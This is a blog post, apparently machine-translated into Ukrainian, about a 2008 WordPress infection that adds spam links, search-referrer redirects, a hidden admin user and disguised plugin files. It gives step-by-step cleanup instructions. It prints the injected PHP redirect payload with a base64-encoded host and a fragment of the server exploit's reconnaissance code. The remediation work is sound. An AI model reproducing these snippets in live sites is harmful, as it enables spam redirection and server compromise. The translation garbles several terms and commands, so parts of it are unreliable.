Протягом останнього місяця я постійно отримував попередження від вірус в блозі від деяких відвідувачів. Спочатку я проігнорував попередження, тому що у мене був встановлений досить хороший антивірус (Касперський А. В. 2009) і хоча я провів тривалий час у блозі, я ніколи не отримував сповіщення про вірус (.. деякий час тому я побачив щось підозріле, що зникло під час першого оновлення. нарешті...).
Повільно, повільно почали з’являтися великі варіації трафік відвідувачів, після чого останнім часом трафік постійно зменшується і людей, які мені це говорять, стає все більше StealthSettings.com це вірусат. Вчора я отримав від когось скріншот, зроблений, коли антивірус заблокував один сценарій із сайту stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Для мене це було достатньо переконливо, я почав шукати його в усіх джерелах. Перша ідея, яка прийшла мені в голову, — це зробити оновлення до останньої версії WordPress (2.5.1), але не раніше, ніж видалити всі старі файли сценарію WordPress і зробити резервне копіювання бази даних. Ця процедура не дала жодних результатів, і, ймовірно, мені знадобилося б багато часу, щоб зрозуміти, де була помилка, якби він мені не сказав Євген у дискусії за кавою, що він знайшов посилання у Google, і було б добре це побачити.
MyDigitalLife.info опублікував статтю під назвою: "WordPress Hack: відновіть і виправте Google і пошукову систему або не перенаправляйте трафік файлів cookie на Your-Needs.info, AnyResults.Net, Golden-Info.net та інші незаконні сайти», це кінець теми, яка мені потрібна.
Йдеться про а експлуатувати від WordPress на основі файлів cookie, яка на мій погляд дуже складна і зроблена по книзі. Досить розумний, щоб зробити його SQL ін'єкція в базі даних блогу, щоб створити невидимого користувача до простої планової перевірки від Прилад->Користувачі, для перевірки «записуваних» каталогів і файлів на сервері (які мають chmod 777), to search і to виконувати файли з груповими або навіть правами root. Я не знаю назви експлойта і бачу, що про нього написано мало статей, незважаючи на те, що є багато заражених блогів, у тому числі з Румунії. Добре... Я спробую пояснити загальні відомості про цей вірус.

Що робить вірус?

Перш за все, він вставляє в джерела сторінок у блогах невидимі посилання для відвідувачів, але видимі та індексовані для пошукових систем, особливо Google. Таким чином передавати Page Rank на сайти, вказані зловмисником. По-друге, вставляється ще один код перенаправлення URL-адреса для відвідувачів, які прийшли з Google, Live, Yahoo, ... або з читача RSS і не мають сайту печиво. І антивірус визначає це перенаправлення як Trojan-Clicker.HTML.

Симптоми:

Масове падіння трафіку відвідувачів, особливо в блогах, більшість відвідувачів яких надходять із Google.

Визначте: (тут проблема стає складнішою для тих, хто мало знає про phpmyadmin, php і linux)

. ОБЕРЕЖНО!!! СПОЧАТКУ ЗРОБІТЬ БЕКАП БАЗИ ДАНИХ!!!

1. Перевірте джерела файлів index.php, header.php, Фул.php, із теми блогу та перевірте, чи існує код, який використовує шифрування база64 або містить "if($ser=="1? && sizeof($_COOKIE)==0)” у формі:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

...або щось подібне. Видаліть цей код!

Натисніть, щоб уявити…

На скріншоті вище я помилково вибрав "<?php get_header(); ?>Цей код має залишитися.

2. Використання phpmyadmin і перейдіть до таблиці в базі даних wp_users, де ви перевіряєте, чи є користувач без імені, створений на 00:00:00 0000-00-00 (можна в польових умовах user_login пишуть "WordPress". Запишіть ідентифікатор цього користувача (поле ID), а потім видаліть його.

Натисніть, щоб уявити…

* той, що на зеленій лінії, його ідентифікатор потрібно видалити та зберегти. У його випадку сонний, було ID=8 .

3. Підійдіть до столу wp_usermeta, де треба розташований ти є Видаляти рядки, пов’язані з ідентифікатором (де в полі user_id з’являється значення видаленого ідентифікатора).

4. У табл wp_option, заходьте active_plugins і подивіться, який плагін підозріло активовано. Він може використовувати такі закінчення, як _old.giff, _old.pngg, _old.jpeg, _new.php.giffі т. д. комбінації фіктивних розширень зображень із _old і _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Видаліть цей плагін, а потім перейдіть до блогу –> Приладова панель –> Плагіни, де ви деактивуєте та активуєте певний плагін.

Натисніть на зображення, щоб побачити, як заражений файл виглядає в active_plugins.

Дотримуйтеся шляху FTP або SSH, указаного в active_plugins, і видаліть файл із сервера.

5. Також у phpMyAdmin, у табл wp_option, знайдіть і видаліть рядок, що містить "rss_f541b3abd05e7962fcab37737f40fad8"і повернути"internal_links_cache”.
У internal_links_cache спам-посилання, які з’являються в блозі, і a Код Google Adsense, хакера.

6. Рекомендується, щоб ви Змінити пароль входу в блог тощо видалити всіх підозрілих користувачів. Оновіть WordPress до останньої версії та налаштуйте блог так, щоб він більше не дозволяв реєстрацію нових користувачів. Немає втрат... навіть не авторизовані можуть коментувати.

Вище я намагався пояснити, наскільки, що робити в такій ситуації, щоб очистити блог від цього вірусу. Проблема набагато серйозніша, ніж здається, і не далека від вирішення, тому що вони використовуються вразливості системи безпеки хостингового веб-сервера, на якому знаходиться блог.

Як перший захід безпеки, хто має доступ Ssh, щоб зробити деякі перевірки на сервері, щоб побачити, чи є ще такі файли, як *_old* і *_new.* із закінченнями .gif, .jpeg, .pngg, .jpgg. Ці файли необхідно видалити. Якщо ми перейменуємо файл, напр. top_right_old.gif у top_right_old.php, ми бачимо, що файл містить саме код експлойту сервера.

Деякі корисні поради щодо перевірки, очищення та захисту сервера. (через SSH)

1. cd /tmp і перевірте, чи є такі папки tmpVFlma або інші подібні комбінації імен і видаліть їх. Ви можете побачити на скріншоті нижче дві такі папки для мене:

rm –rf номер папки

2. Перевірте та видаліть (змініть chmod) якомога більше папок з атрибутами chmod 777

знайти всі доступні для запису файли в поточному каталозі: знайти . -тип f -perm -2 -ls
знайти всі доступні для запису каталоги в поточному каталозі: знайти . -тип d -perm -2 -l
знайти всі доступні для запису каталоги та файли в поточному каталозі: знайти . -perm -2 –l

3. Шукайте підозрілі файли на сервері.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, ОБЕРЕЖНО!!! до файлів, які встановлюють біт ПІВДЕНЬ і Кататися на ковзанах. Ці файли виконуються з привілеями користувача (групи) або root, а не з привілеями користувача, який виконує файл. Ці файли можуть призвести до компрометації кореневої системи, якщо є проблеми з безпекою. Якщо ви не використовуєте файли з бітами SUID і SGID, запустіть «chmod 0” на них або видаліть пакет, що їх містить.

Експлойт містить десь у джерелі...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

...практично таким чином він знаходить порушення безпеки. Відкриті порти, «записувані» каталоги та виконання файлів із привілеями групи / root.

Я повернуся з деталями...

Деякі заражені блоги: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... і цей список можна продовжувати ... багато.

Перевірити, чи заражений блог, можна за допомогою пошукової системи Google. копія & вставити:

сайт: www.blegoo.com купити

Доброї ночі та гарної роботи;) Незабаром, я думаю, Євген прийде з новинами на prevezibil.imprevizibil.com.

брб :)

АТ: УВАГА! Зміна теми WordPress або оновлення до WordPress 2.5.1 НЕ є рішенням для позбавлення від цього вірусу.